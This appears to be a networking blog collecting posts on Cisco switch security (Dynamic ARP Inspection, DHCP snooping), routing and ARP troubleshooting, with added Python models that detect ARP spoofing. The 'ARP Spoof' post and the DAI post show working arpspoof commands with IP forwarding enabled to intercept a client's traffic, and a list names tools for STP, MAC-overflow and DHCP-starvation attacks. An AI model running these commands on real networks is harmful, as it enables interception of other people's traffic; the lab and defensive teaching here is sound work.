Showing posts with label ARP.

30 July, 2014

Dynamic ARP Inspection (DAI)

# Attack Scenario 

Mitigate with ARP Inspection
- Uses DHCP Snooping DB/Table
- Can use Static ARP ACL to Map
- To Trust or Not to Trust
- Header to Payload Validation

! ARP inspection uses the DHCP Snooping table
SW2#show ip dhcp snooping binding
MacAddress          IpAddress        Lease(sec)  Type           VLAN  Interface
------------------  ---------------  ----------  -------------  ----  --------------------
00:0C:29:16:57:AC   10.123.0.3       85971       dhcp-snooping  123   FasEthernet0/2 
B8:27:EB:51:1A:F6   10.123.0.4       82867       dhcp-snooping  123   FasEthernet0/5
Total number of bindings: 2

! Configure ARP Inspection
SW2(config)#ip arp inspection vlan 123

SW2(config)#do show ip arp inspection vlan 123
Source Mac Validation      : Disabled
Destination Mac Validation : Disabled
IP Address Validation      : Disabled
 Vlan     Configuration    Operation   ACL Match          Static ACL
 ----     -------------    ---------   ---------          ----------
  123     Enabled          Active

 Vlan     ACL Logging      DHCP Logging      Probe Logging
 ----     -----------      ------------      -------------
  123     Deny             Deny              Off

! Configure Trunk port
SW2(config)#int fas 0/2
SW2(config-if)#description trunk port
SW2(config-if)#ip arp inspection trust

! Configure Access port
SW2(config)#int fas 0/1
SW2(config-if)#description user port
SW2(config-if)#ip arp inspection limit rate 10

*** Logs after Attack
%SW_DAI-4-DHCP_SNOOPING_DENY: 1 Invalid ARPs (Res) on Fa0/1, vlan 123. ([b827.eb51.1af6/10.123.0.6.57ac/10.123.0.3/01:23:03 UTC Mon May 4 1991])

*** Logs after running some Nmap scans
%SW_DAI-4-PACKET_RATE_EXCEEDED: 11 packets recived in 25 milliseconds on Fa0/1.
%PM-4-ERR_DISABLE: arp-inspection error detected on Fa0/1, putting Fa0/1 in err-disable state

* For more info use:
SW2#show interfaces status err-disable
SW2#show ip arp inspection statistics vlan 123

! Configure 3 additional validation checks
SW2(config)#ip arp inspection validate src-mac dst-mac ip

SW2(config)#do show ip arp inspection vlan 123
Source Mac Validation      : Enabled                                 <---
Destination Mac Validation : Enabled                                 <---
IP Address Validation      : Enabled                                 <---
 Vlan     Configuration    Operation   ACL Match          Static ACL
 ----     -------------    ---------   ---------          ----------
  123     Enabled          Active

 Vlan     ACL Logging      DHCP Logging      Probe Logging
 ----     -----------      ------------      -------------
  123     Deny             Deny              Off

! Configure ARP Access List For R1
SW2(config)#interface fastEthernet 0/3
SW2(config-if)#description Trunk to R1
SW2(config-if)#exit

SW2(config)#arp access-list OUR-ARP-ACL
SW2(config-arp-nacl)#permit ip host 10.123.0.1 mac host 001f.9e00.ee89

! Verify
SW2(config-arp-nacl)#do show arp access-list OUR-ARP-ACL
ARP access list OUR-ARP-ACL
    permit ip host 10.123.0.1 mac host 001f.9e00.ee89

! Apply ACL Filter
SW2(config)#ip arp inspection filter OUR-ARP-ACL vlan 123

SW2(config)#do show ip arp inspection vlan 123
Source Mac Validation      : Enabled
Destination Mac Validation : Enabled
IP Address Validation      : Enabled

 Vlan     Configuration    Operation   ACL Match          Static ACL
 ----     -------------    ---------   ---------          ----------
  123     Enabled          Active      OUR-ARP-ACL        No

 Vlan     ACL Logging      DHCP Logging      Probe Logging
 ----     -----------      ------------      -------------

  123     Deny             Deny              Off

! Auto re-enable port
SW2(config)#errdisable recovery cause arp-inspection

SW2(config)#errdisable recovery interval 30

root@kali#arpspoof -i eth0 -t 10.123.0.3 10.123.0.1
b8:27:eb:51:1a:f6 0:c:29:16:57:ac 0806 42: arp reply 10.123.0.1 is-at b8:27:eb:51:1a:f6

SWITCH LOG
%SW_DAI-4-DHCP_SNOOPING_DENY: 1 Invalid ARPs (Res) on Gi0/2, vlan 123 ([b827.eb51.1af6/10.123.0.1/0:c:29:16:57:ac/10.123.0.1/15:34:45 UTC Mon Mar 2 1991])

SW2(config)#do show ip arp inspection statistics vlan 123
 Vlan     Forwarded        Dropped     DHCP Drops       ACL Drops
 ----     ---------        --------    ----------       ---------
  123          40             24           24               0

 Vlan     DHCP Permits     ACL Permits    Probe Permits   Secure MAC Failure
 ----     ------------     -----------    -------------   ------------------
  123         25               11               0                  0 


 Vlan     Dest MAC Failure    IP Validation Failure    Invalid Protocol Data 
-----     ----------------    ---------------------   -----------------------
  123             0                     0                        0 
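To make the order of DAI's checks concrete, here is an added Python model of the decision path (example code written for this page, not Cisco's implementation). It parses a constructed copy of the `show ip dhcp snooping binding` output above, applies the lab configuration (trusted ports, the OUR-ARP-ACL entry, the three validate options and the rate limit of 10 pps) to constructed ARP replies, and shows why the arpspoof reply at the end of this post is counted as a DHCP drop and not an ACL drop: the ACL entry is a combined IP-plus-MAC match, so a packet that does not match it falls through to the binding table unless the filter was applied with `static`. The relative order of the three validations and the one-second rate window are assumptions.

```python
"""Added model of the DAI check order (example code written for this page, not Cisco's implementation).
Trusted ports bypass inspection; untrusted ports get the optional validations, then the ARP ACL
(consulted before the DHCP bindings), then the binding table. Validation order and the
one-second rate window are assumptions; the binding text and the packets are constructed."""
import re
from dataclasses import dataclass, field

# Constructed from the "show ip dhcp snooping binding" output above.
SNOOPING_BINDING_OUTPUT = """\
MacAddress          IpAddress        Lease(sec)  Type           VLAN  Interface
------------------  ---------------  ----------  -------------  ----  --------------------
00:0C:29:16:57:AC   10.123.0.3       85971       dhcp-snooping  123   FastEthernet0/2
B8:27:EB:51:1A:F6   10.123.0.4       82867       dhcp-snooping  123   FastEthernet0/5
Total number of bindings: 2
"""
BINDING_RE = re.compile(r"^([0-9A-Fa-f:]{17})\s+(\d+(?:\.\d+){3})\s+\d+\s+\S+\s+(\d+)\s+\S+$")

def canon_mac(mac: str) -> str:
    """Normalise b8:27:eb:51:1a:f6, b827.eb51.1af6 or 0:c:29:16:57:ac to 12 hex digits."""
    parts = re.split(r"[:.-]", mac.lower())
    return "".join(p.zfill({6: 2, 3: 4}[len(parts)]) for p in parts)

def parse_bindings(text: str) -> dict:
    """Return {(vlan, ip): mac} from the binding table output."""
    table = {}
    for line in text.splitlines():
        m = BINDING_RE.match(line.strip())
        if m:
            mac, ip, vlan = m.groups()
            table[(int(vlan), ip)] = canon_mac(mac)
    return table

@dataclass
class Arp:
    ingress: str        # switch port the frame arrived on
    vlan: int
    eth_src: str        # Ethernet header addresses
    eth_dst: str
    sender_mac: str     # ARP payload fields
    sender_ip: str
    target_mac: str
    target_ip: str
    is_reply: bool

@dataclass
class DaiConfig:
    inspected_vlans: set
    trusted_ports: set = field(default_factory=set)
    arp_acl: list = field(default_factory=list)   # [(action, ip, mac)], first match wins
    acl_static: bool = False                      # "ip arp inspection filter ... static"
    validate: set = field(default_factory=set)    # subset of {"src-mac", "dst-mac", "ip"}

def invalid_ip(ip: str) -> bool:
    """Addresses the 'ip' validation rejects: 0.0.0.0, 255.255.255.255 and multicast."""
    return ip in ("0.0.0.0", "255.255.255.255") or 224 <= int(ip.split(".")[0]) <= 239

def inspect(pkt: Arp, cfg: DaiConfig, bindings: dict) -> str:
    """Return 'forward' or a drop reason matching the counters in 'show ip arp inspection statistics'."""
    if pkt.vlan not in cfg.inspected_vlans or pkt.ingress in cfg.trusted_ports:
        return "forward"                      # uninspected VLAN or trusted port: no checks at all
    smac, sip = canon_mac(pkt.sender_mac), pkt.sender_ip
    if "src-mac" in cfg.validate and canon_mac(pkt.eth_src) != smac:
        return "drop: src-mac validation"     # Ethernet source and ARP sender MAC disagree
    if "dst-mac" in cfg.validate and pkt.is_reply and canon_mac(pkt.eth_dst) != canon_mac(pkt.target_mac):
        return "drop: dst-mac validation"
    if "ip" in cfg.validate and (invalid_ip(sip) or (pkt.is_reply and invalid_ip(pkt.target_ip))):
        return "drop: ip validation"
    for action, ip, mac in cfg.arp_acl:       # ACL entries are checked before the bindings
        if ip == sip and canon_mac(mac) == smac:
            return "forward" if action == "permit" else "drop: ACL"
    if cfg.acl_static and cfg.arp_acl:
        return "drop: ACL"                    # with "static" the implicit deny is final
    if bindings.get((pkt.vlan, sip)) == smac:
        return "forward"
    return "drop: DHCP binding"               # logged as %SW_DAI-4-DHCP_SNOOPING_DENY

def rate_limited(arrivals_ms: list, limit_pps: int = 10, window_ms: int = 1000) -> bool:
    """True when more than limit_pps packets fall in any window ('limit rate 10' err-disabled Fa0/1)."""
    times, start = sorted(arrivals_ms), 0
    for end, t in enumerate(times):
        while t - times[start] >= window_ms:
            start += 1
        if end - start + 1 > limit_pps:
            return True
    return False

BINDINGS = parse_bindings(SNOOPING_BINDING_OUTPUT)
LAB = DaiConfig(inspected_vlans={123}, trusted_ports={"Fa0/2", "Fa0/3"},
                arp_acl=[("permit", "10.123.0.1", "001f.9e00.ee89")],
                validate={"src-mac", "dst-mac", "ip"})
# Constructed packets: the arpspoof reply shown later in this post, R1's genuine reply, and a DHCP client's reply.
SPOOFED_REPLY = Arp("Fa0/1", 123, "b8:27:eb:51:1a:f6", "0:c:29:16:57:ac",
                    "b8:27:eb:51:1a:f6", "10.123.0.1", "0:c:29:16:57:ac", "10.123.0.3", True)
ROUTER_REPLY = Arp("Fa0/1", 123, "00:1f:9e:00:ee:89", "0:c:29:16:57:ac",
                   "001f.9e00.ee89", "10.123.0.1", "0:c:29:16:57:ac", "10.123.0.3", True)
CLIENT_REPLY = Arp("Fa0/1", 123, "00:0c:29:16:57:ac", "b8:27:eb:51:1a:f6",
                   "00:0c:29:16:57:ac", "10.123.0.3", "b8:27:eb:51:1a:f6", "10.123.0.4", True)
```

Calling `inspect(SPOOFED_REPLY, LAB, BINDINGS)` returns `drop: DHCP binding`, `ROUTER_REPLY` is forwarded on the ACL entry even though R1 has no DHCP binding, and `CLIENT_REPLY` is forwarded on its binding; `rate_limited([i * 2 for i in range(11)])` reproduces the 11-packets-in-25-ms burst that err-disabled Fa0/1.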

17 July, 2014

IPv4 IGP Troubleshooting


R1#show ip route 
     10.0.0.0/24 is subnetted, 3 subnets
C       10.1.13.0 is directly connected, Serial0/0
C       10.1.1.0 is directly connected, Loopback0
C       10.1.146.0 is directly connected, FastEthernet0/0

* I have two directly connected networks and one Loopback.
* The network 10.1.146.0/24 is the segment shared by R1, R4 and R6.

# Make ping
R1#ping 10.1.146.6
Sending 5, 100-byte ICMP Echos to 10.1.146.6, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 8/20/52 ms

R1#ping 10.1.146.4
Sending 5, 100-byte ICMP Echos to 10.1.146.4, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 16/22/32 ms

* When a ping succeeds, it tells us that three things are correctly configured:

1) Routing lookup process is correct
2) Switching mechanism is moving packets out the interface 
3) Encapsulation is correctly configured

R1#show ip route 10.1.146.6
Routing entry for 10.1.146.0/24
  Known via "connected", distance 0, metric 0 (connected, via interface)
  Routing Descriptor Blocks:
  * directly connected, via FastEthernet0/0   <---- We know where we have to send.
      Route metric is 0, traffic share count is 1
 
R1#show ip cef exact-route 10.1.146.1 10.1.146.4
10.1.146.1      -> 10.1.146.4     : FastEthernet0/0 (next hop 10.1.146.4) <-- we need to know the next hop's MAC address.

R1#show arp 
Protocol  Address          Age (min)  Hardware Addr   Type   Interface
Internet  10.1.146.1              -   c201.0d08.0000  ARPA   FastEthernet0/0
Internet  10.1.146.4             32   c200.0d08.0000  ARPA   FastEthernet0/0    <--- MAC Address
Internet  10.1.146.6             32   c205.1488.0000  ARPA   FastEthernet0/0

* Now we know how to forward traffic out the interface.
* If nothing is filtering ARP, we have basic connectivity.

# Configure an incorrect ARP entry.

R1(config)#arp 10.1.146.4 aaaa.aaaa.aaa4 arpa

R1#show arp 
Protocol  Address          Age (min)  Hardware Addr   Type   Interface
Internet  10.1.146.1              -   c201.0d08.0000  ARPA   FastEthernet0/0
Internet  10.1.146.4              -   aaaa.aaaa.aaa4  ARPA                       <--- Static ARP entry
Internet  10.1.146.6             41   c205.1488.0000  ARPA   FastEthernet0/0

R1#ping 10.1.146.4
Sending 5, 100-byte ICMP Echos to 10.1.146.4, timeout is 2 seconds:
.....
Success rate is 0 percent (0/5)

* The connectivity failed.

# Configure Route to reach Lo 0 of R4

R1(config)#ip route 10.1.4.0 255.255.255.0 10.1.146.4

R1#ping 10.1.4.4
Sending 5, 100-byte ICMP Echos to 10.1.4.4, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 20/25/32 ms

R1#show ip cef exact-route 10.1.146.1 10.1.4.4
10.1.146.1      -> 10.1.4.4       : FastEthernet0/0 (next hop 10.1.146.4) 

R1#show ip route static
     10.0.0.0/24 is subnetted, 4 subnets
S       10.1.4.0 [1/0] via 10.1.146.4

* Now I have to know how to reach 10.1.146.4

R1#show ip route 10.1.146.4
Routing entry for 10.1.146.0/24
  Known via "connected", distance 0, metric 0 (connected, via interface)
  Routing Descriptor Blocks:
  * directly connected, via FastEthernet0/0    
      Route metric is 0, traffic share count is 1

# Configure an incorrect, more specific route.
 
R1(config)#ip route 10.1.146.4 255.255.255.255 serial 0/0

R1(config)#do ping 10.1.146.4
Sending 5, 100-byte ICMP Echos to 10.1.146.4, timeout is 2 seconds:
UUUUU
Success rate is 0 percent (0/5)

* The connectivity failed.

# Debug 

R1(config)#do debug ip icmp 
ICMP packet debugging is on
R1(config)#do ping 10.1.146.4
Sending 5, 100-byte ICMP Echos to 10.1.146.4, timeout is 2 seconds:
UUUUU
Success rate is 0 percent (0/5)

*Mar  1 01:38:04.599: ICMP: dst (10.1.13.1) host unreachable rcv from 10.1.13.3
*Mar  1 01:38:04.627: ICMP: dst (10.1.13.1) host unreachable rcv from 10.1.13.3
*Mar  1 01:38:04.635: ICMP: dst (10.1.13.1) host unreachable rcv from 10.1.13.3
*Mar  1 01:38:04.635: ICMP: dst (10.1.13.1) host unreachable rcv from 10.1.13.3
*Mar  1 01:38:04.639: ICMP: dst (10.1.13.1) host unreachable rcv from 10.1.13.3

* This says that R3 does not have a route to the destination.

# Configure an incorrect outgoing interface.

R1(config)#ip route 10.1.4.4 255.255.255.255 ser0/0 10.1.146.4

R1#show ip route 10.1.4.4  
Routing entry for 10.1.4.4/32
  Known via "static", distance 1, metric 0
  Routing Descriptor Blocks:
  * 10.1.146.4, via Serial0/0              <--- incorrect out interface
      Route metric is 0, traffic share count is 1

01 February, 2014

IP Address or Outgoing Interface

R1#conf terminal
R1(config)#ip route 0.0.0.0 0.0.0.0 11.11.11.2
R1(config)#exit
R1#ping 192.168.1.1
Sending 5, 100-byte ICMP Echos to 192.168.1.1, timeout is 2 seconds:
.!!!!
Success rate is 80 percent (4/5), round-trip min/avg/max = 16/57/152 ms

R1#show arp
Protocol  Address          Age (min)  Hardware Addr   Type   Interface
Internet  11.11.11.2              0   c202.1464.0000  ARPA   FastEthernet0/0
Internet  11.11.11.1              -   c200.1464.0000  ARPA   FastEthernet0/0

R1(config)#no ip route 0.0.0.0 0.0.0.0 11.11.11.2
R1(config)#ip route 0.0.0.0 0.0.0.0 fastEthernet 0/0
R1(config)#exit
R1#clear arp-cache
R1#ping 192.168.1.1
Sending 5, 100-byte ICMP Echos to 192.168.1.1, timeout is 2 seconds:
.!!!!
Success rate is 80 percent (4/5), round-trip min/avg/max = 8/28/64 ms
R1#show arp
Protocol  Address          Age (min)  Hardware Addr   Type   Interface
Internet  11.11.11.2              0   c202.1464.0000  ARPA   FastEthernet0/0
Internet  11.11.11.1              -   c200.1464.0000  ARPA   FastEthernet0/0
Internet  192.168.1.1             0   c202.1464.0000  ARPA   FastEthernet0/0

Note:
Everything works, but as you can see, the ARP table grows with each destination;
imagine this in a production environment with users connecting to the Internet.
Note:
Another issue we could have is that if Proxy-ARP is disabled on the other router, connectivity breaks (no reply to the ARP requests).

# Disable Proxy ARP
R2(config)#interface fastEthernet 0/0
R2(config-if)#no ip proxy-arp

R1#ping 192.168.2.1
Sending 5, 100-byte ICMP Echos to 192.168.2.1, timeout is 2 seconds:
.....
Success rate is 0 percent (0/5)
R1#show arp
Protocol  Address          Age (min)  Hardware Addr   Type   Interface
Internet  11.11.11.2              9   c202.1464.0000  ARPA   FastEthernet0/0
Internet  11.11.11.1              -   c200.1464.0000  ARPA   FastEthernet0/0
Internet  192.168.1.1             8   c202.1464.0000  ARPA   FastEthernet0/0
Internet  192.168.2.1             0   Incomplete      ARPA

Note:
When possible, always use the IP address as the next-hop on point-to-multipoint mediums.
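The troubleshooting walk-through above (the /32 static route that pulls 10.1.146.4 out Serial0/0) and this post's default route pointing at an interface both come down to the same two steps: longest-prefix lookup with recursive next-hop resolution, then an ARP exchange for whatever address that step leaves as the next hop. The following added Python model (example code, not from the original posts) carries both experiments through. The RIB entries and R2's MAC address are constructed from the `show ip route` and `show arp` output above; that only FastEthernet0/0 uses ARP, and that R2 is the only neighbour and routes 192.168.0.0/16, are assumptions.

```python
"""Added model of route lookup, next-hop recursion and ARP resolution (example code, not from the posts).
Media type per interface (only FastEthernet0/0 does ARP) and R2's routing scope are assumptions;
RIB entries and MAC addresses are constructed from the show output above."""
import ipaddress
from dataclasses import dataclass
from typing import Optional

@dataclass(frozen=True)
class Route:
    prefix: str                     # e.g. "10.1.146.0/24"; connected routes have iface only
    via_ip: Optional[str] = None    # next-hop address, if any
    iface: Optional[str] = None     # outgoing interface, if any

def lookup(rib, dst):
    """Longest-prefix match, as 'show ip route <dst>' does; None when nothing matches."""
    addr, best, best_len = ipaddress.ip_address(dst), None, -1
    for r in rib:
        net = ipaddress.ip_network(r.prefix)
        if addr in net and net.prefixlen > best_len:
            best, best_len = r, net.prefixlen
    return best

def resolve(rib, dst, depth=0):
    """Return (egress interface, address to ARP for), recursing through next-hop-only routes as CEF does."""
    r = lookup(rib, dst)
    if r is None or depth > 8:
        return None
    if r.via_ip is None:             # connected or interface-only static: the destination itself is treated as on-link
        return (r.iface, dst)
    if r.iface is not None:          # "ip route <net> <mask> <iface> <next-hop>": no recursion needed
        return (r.iface, r.via_ip)
    return resolve(rib, r.via_ip, depth + 1)

class Neighbor:
    """A device on the Ethernet segment: the IPs it owns, the prefixes it routes and its proxy-ARP setting."""
    def __init__(self, mac, owned, routes_to=(), proxy_arp=True):
        self.mac, self.owned, self.routes_to, self.proxy_arp = mac, set(owned), list(routes_to), proxy_arp

    def answers(self, target_ip):
        """Reply to an ARP request for its own address or, with proxy-ARP on, for anything it can route to."""
        if target_ip in self.owned:
            return True
        t = ipaddress.ip_address(target_ip)
        return self.proxy_arp and any(t in ipaddress.ip_network(p) for p in self.routes_to)

def send(rib, links, arp_cache, dst):
    """Forward one packet: route lookup, then a cached ARP exchange when the egress is a link in `links`."""
    res = resolve(rib, dst)
    if res is None:
        return "no route"
    iface, arp_for = res
    if iface not in links:                       # e.g. Serial0/0: no ARP on that media
        return f"out {iface}"
    if arp_for not in arp_cache:
        hit = [n.mac for n in links[iface] if n.answers(arp_for)]
        arp_cache[arp_for] = hit[0] if hit else "Incomplete"
    return f"out {iface} to {arp_cache[arp_for]}"

# First post: R1's routes, then the "incorrect more specific route" sending 10.1.146.4 out Serial0/0.
R1_RIB = [Route("10.1.146.0/24", iface="FastEthernet0/0"),
          Route("10.1.13.0/24", iface="Serial0/0"),
          Route("10.1.4.0/24", via_ip="10.1.146.4")]
BAD_HOST_ROUTE = Route("10.1.146.4/32", iface="Serial0/0")

# Second post: R1's connected segment and the two forms of default route.
CONNECTED = Route("11.11.11.0/24", iface="FastEthernet0/0")
DEFAULT_VIA_IP = [CONNECTED, Route("0.0.0.0/0", via_ip="11.11.11.2")]
DEFAULT_VIA_IFACE = [CONNECTED, Route("0.0.0.0/0", iface="FastEthernet0/0")]

def arp_entries_after(rib, destinations, proxy_arp=True):
    """Ping each destination from R1 and return the ARP cache that results.
    R2 (11.11.11.2, MAC from 'show arp' above) is assumed to be the only neighbour and to route 192.168.0.0/16."""
    r2 = Neighbor("c202.1464.0000", {"11.11.11.2"}, ["192.168.0.0/16"], proxy_arp)
    cache = {}
    for dst in destinations:
        send(rib, {"FastEthernet0/0": [r2]}, cache, dst)
    return cache
```

With `R1_RIB` alone, `resolve(R1_RIB, "10.1.4.4")` recurses through 10.1.146.4 to FastEthernet0/0; once `BAD_HOST_ROUTE` is added the /32 wins the longest-match and both 10.1.146.4 and everything behind it go out Serial0/0. `arp_entries_after(DEFAULT_VIA_IP, [...])` leaves a single entry for 11.11.11.2 however many destinations are pinged, while the interface-only default produces one proxy-ARP entry per destination and, with `proxy_arp=False`, the `Incomplete` entry shown above.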

16 November, 2013

DHCP Snooping

Configure DHCP Snooping For VLAN 101: (Global Configuration)
configure terminal 
no ip dhcp snooping information option
ip dhcp snooping 
ip dhcp snooping vlan 101

Configure Trunk Ports:
interface range fastEthernet 0/7-8 (Trunk Ports Connected To DHCP. DHCP Offers Are Permitted)
ip dhcp snooping trust 

Configure Access Port Limits:   (User Port)
interface fastEthernet 0/1
ip dhcp snooping limit rate 5  (5 DHCP Offers)

Configure Errdisable: 
errdisable detect cause dhcp-rate-limit
errdisable recovery cause dhcp-rate-limit
errdisable recovery interval 30

Configure Dynamic ARP Inspection DAI: (Global Configuration)
configure terminal 
ip arp inspection vlan 101 
ip arp inspection log-buffer entries 1024
ip arp inspection log-buffer logs 1024 interval 10

Configure Trunk Ports: (Trust Ports)
interface range fastEthernet 0/7-8
ip arp inspection trust

Commands to verify the configuration:
show ip dhcp snooping
debug ip dhcp snooping event 
show log
show errdisable

DHCP Snooping is a security feature capable of intercepting DHCP messages crossing a switch and blocking bogus DHCP offers. DHCP Snooping uses the concept of trusted and untrusted ports. Typically, the trusted ports are used to reach DHCP servers or relay agents, while untrusted ports are used to connect to clients.

Dynamic ARP Inspection (DAI) is a security feature that helps prevent ARP poisoning and other ARP-based attacks by intercepting all ARP requests and responses, and by verifying their authenticity before updating the switch's local ARP cache or forwarding the packets to the intended destinations.
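The `show log` step in the verification list above is where DAI and DHCP snooping violations surface, in the `%SW_DAI-4-*` and `%PM-4-ERR_DISABLE` messages shown in the DAI post. The following added Python parser (example code, not part of the original post) turns those messages into a per-port summary and flags a MAC that was denied while claiming more than one sender IP, which is the pattern a spoofer answering for both ends of a conversation leaves behind. The message formats are the ones printed by the switch on this page; the log lines, with their timestamp prefix and the second denied reply, are constructed.

```python
"""Added parser for the DAI syslog messages shown in the DAI post above (example code, not from the post).
The timestamp prefix and the second denied reply are constructed; the message formats are the
ones printed by the switch on this page."""
import re
from collections import defaultdict

DENY_RE = re.compile(
    r"%SW_DAI-4-DHCP_SNOOPING_DENY: (\d+) Invalid ARPs \((Req|Res)\) on ([\w/]+), vlan (\d+)\.? "
    r"\(\[([^/]+)/([^/]+)/([^/]+)/([^/]+)/([^\]]+)\]\)")
# "rec\w+" tolerates both the "received" spelling and the "recived" seen in the post's output.
RATE_RE = re.compile(r"%SW_DAI-4-PACKET_RATE_EXCEEDED: (\d+) packets rec\w+ in (\d+) milliseconds on ([\w/]+)")
ERRDIS_RE = re.compile(r"%PM-4-ERR_DISABLE: arp-inspection error detected on ([\w/]+), putting")

# Constructed sample: the first line is the switch log shown above, the rest follow the same formats.
SAMPLE_LOG = """\
*Mar  2 15:34:45.101: %SW_DAI-4-DHCP_SNOOPING_DENY: 1 Invalid ARPs (Res) on Gi0/2, vlan 123 ([b827.eb51.1af6/10.123.0.1/0:c:29:16:57:ac/10.123.0.1/15:34:45 UTC Mon Mar 2 1991])
*Mar  2 15:34:47.233: %SW_DAI-4-DHCP_SNOOPING_DENY: 1 Invalid ARPs (Res) on Gi0/2, vlan 123 ([b827.eb51.1af6/10.123.0.3/0:1f:9e:0:ee:89/10.123.0.1/15:34:47 UTC Mon Mar 2 1991])
*Mar  2 15:35:10.009: %SW_DAI-4-PACKET_RATE_EXCEEDED: 11 packets received in 25 milliseconds on Fa0/1.
*Mar  2 15:35:10.012: %PM-4-ERR_DISABLE: arp-inspection error detected on Fa0/1, putting Fa0/1 in err-disable state
*Mar  2 15:35:10.020: %LINK-3-UPDOWN: Interface FastEthernet0/1, changed state to down
""".splitlines()

def new_port_record():
    return {"denied": 0, "claims": defaultdict(set), "rate_events": 0, "err_disabled": False}

def summarize(lines):
    """Per-port view: ARPs DAI denied, which (MAC, sender IP) pairs it saw, rate-limit hits and err-disable."""
    ports = defaultdict(new_port_record)
    for line in lines:
        if m := DENY_RE.search(line):
            count, _kind, port, _vlan, smac, sip = m.groups()[:6]
            ports[port]["denied"] += int(count)
            ports[port]["claims"][smac.lower()].add(sip)
        elif m := RATE_RE.search(line):
            ports[m.group(3)]["rate_events"] += 1
        elif m := ERRDIS_RE.search(line):
            ports[m.group(1)]["err_disabled"] = True
    return ports

def spoof_suspects(summary):
    """MACs denied while claiming more than one sender IP on one port: a spoofer answering for both ends."""
    return {(port, mac): sorted(ips)
            for port, rec in summary.items()
            for mac, ips in rec["claims"].items() if len(ips) > 1}

if __name__ == "__main__":
    s = summarize(SAMPLE_LOG)
    for port, rec in sorted(s.items()):
        print(port, "denied:", rec["denied"], "rate hits:", rec["rate_events"], "err-disabled:", rec["err_disabled"])
    print("suspects:", spoof_suspects(s))
```

The parser uses `search` rather than `match` so the `*Mar  2 ...` timestamp that IOS prepends (and any syslog relay headers) is ignored, and unrelated messages such as the `%LINK-3-UPDOWN` line simply fall through.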


Attacks:

• STP MiTM (Vlan) Attack: Yersinia, Ettercap
• STP MiTM (ISL) Attack: Yersinia, Ettercap, packETH
• ARP MiTM Attack: Ettercap
• MAC Overflow Attack: Ettercap
• DHCP Consumption Attack: Yersinia
• DHCP Starvation Attack: dhcpstarv

02 November, 2013

ARP Spoof

ARP Spoofing

Hacker HWaddr 00:21:85:96:10:4d
Hacker addr:  10.0.101.102

Victim 1 addr: 10.0.101.103 (Client)
Victim 2 addr: 10.0.101.3   (GW)
Start Routing

root@bt:~# cat /proc/sys/net/ipv4/ip_forward 
0

root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward 
root@bt:~# cat /proc/sys/net/ipv4/ip_forward 
1

ARP Spoof Attack

root@bt:~# arpspoof -i eth0 -t 10.0.101.3 10.0.101.103

0:21:85:96:10:4d 0:0:c:7:ac:1 0806 42: arp reply 10.0.101.103 is-at 0:21:85:96:10:4d

root@bt:~# arpspoof -i eth0 -t 10.0.101.103 10.0.101.3 

0:21:85:96:10:4d 0:21:85:96:10:56 0806 42: arp reply 10.0.101.3 is-at 0:21:85:96:10:4d

Victim 
Before:

C:\Documents and Settings\Administrador> arp -a

No se encontraron entradas ARP
After:

C:\Documents and Settings\Administrador> arp -a

Interfaz: 10.0.101.103
Dirección IP             Dirección física          Tipo
10.0.101.3               00-21-85-96-10-4d        dinámico
10.0.101.102             00-21-85-96-10-4d        dinámico
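From the defender's side, the victim's ARP table above already shows the tell-tale sign: two IP addresses, one of them the gateway, resolving to the same hardware address. This added Python check (example code, not from the original post) parses `arp -a` output, including the Spanish-localised form shown above, reports MACs that claim more than one IP, and compares the gateway's entry with an expected MAC captured from a known-clean baseline. The `arp -a` texts are constructed copies of the output above; the expected gateway MAC 00-00-0c-07-ac-01 is taken from the destination MAC of the first arpspoof frame above and is assumed here to be the gateway's real address.

```python
"""Added check for the spoofing signature visible in the victim's ARP table (example code, not from the post).
The 'arp -a' texts are constructed copies of the output above; the expected gateway MAC
00-00-0c-07-ac-01 is taken from the destination MAC of the first arpspoof frame above and is
assumed to be the gateway's real address."""
import re
from collections import defaultdict

# Only data rows are matched, so localised headers ("Interfaz", "Dirección IP", ...) do not matter.
ARP_ROW_RE = re.compile(r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-fA-F]{2}(?:-[0-9a-fA-F]{2}){5})\s+(\S+)")

BEFORE = """\
No se encontraron entradas ARP
"""
AFTER = """\
Interfaz: 10.0.101.103
Dirección IP             Dirección física          Tipo
10.0.101.3               00-21-85-96-10-4d        dinámico
10.0.101.102             00-21-85-96-10-4d        dinámico
"""

def parse_arp_a(text):
    """Return {ip: mac} from Windows 'arp -a' output (MACs lower-cased, dash-separated)."""
    entries = {}
    for line in text.splitlines():
        m = ARP_ROW_RE.match(line)
        if m:
            ip, mac, _entry_type = m.groups()
            entries[ip] = mac.lower()
    return entries

def duplicate_macs(entries):
    """MACs that appear for more than one IP: either a multi-homed host or one host answering for another."""
    by_mac = defaultdict(list)
    for ip, mac in entries.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def check_gateway(entries, gateway_ip, expected_mac):
    """Compare the cached gateway entry against a baseline recorded when the network was known to be clean."""
    seen = entries.get(gateway_ip)
    if seen is None:
        return "gateway not in cache"
    if seen == expected_mac.lower():
        return "ok"
    return f"gateway {gateway_ip} resolves to {seen}, expected {expected_mac.lower()}"

def audit(text, gateway_ip, expected_mac):
    """Run both checks and return a list of findings (empty when nothing looks wrong)."""
    entries = parse_arp_a(text)
    findings = [f"{mac} claims {', '.join(ips)}" for mac, ips in duplicate_macs(entries).items()]
    gw = check_gateway(entries, gateway_ip, expected_mac)
    if gw not in ("ok", "gateway not in cache"):
        findings.append(gw)
    return findings

if __name__ == "__main__":
    for label, text in (("before", BEFORE), ("after", AFTER)):
        print(label, audit(text, "10.0.101.3", "00-00-0c-07-ac-01"))
```

On the "before" table the audit returns nothing; on the "after" table it reports both the shared MAC and the gateway mismatch. A baseline MAC for the gateway is what makes the second check possible, so it is worth recording one (from a switch's `show mac address-table` or the router itself) before an incident rather than during it.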